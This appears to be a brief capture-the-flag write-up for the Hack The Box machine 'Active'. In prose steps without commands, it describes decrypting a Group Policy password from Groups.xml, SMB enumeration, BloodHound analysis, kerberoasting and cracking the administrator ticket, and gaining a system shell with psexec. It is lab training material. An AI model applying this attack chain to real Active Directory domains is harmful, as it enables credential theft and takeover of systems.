Hack The Box :: Active

Group policy embedded password | kerberoasting

Run nmap confirms its a domain controller

Enum the shares

Replication share is read only and interestingly has Groups.xml

using gpp-decrypt you get the password for svc_tgs

Using these credentials doing some smb enum again recursively gives us user.txt flag

Since we have user creds, the logical step would be to use bloodhound and see whats the next step to get to admin. From a windows machine:

Visualizing the output of SharpHound in neo4j/bloodhound tells us that user administrator might be vulnerable to kerberoasting

And we get the kerberos ticket for user administrator

Fairly easy to crack using hashcat and rockyou

Using psexec we get system shell !!!!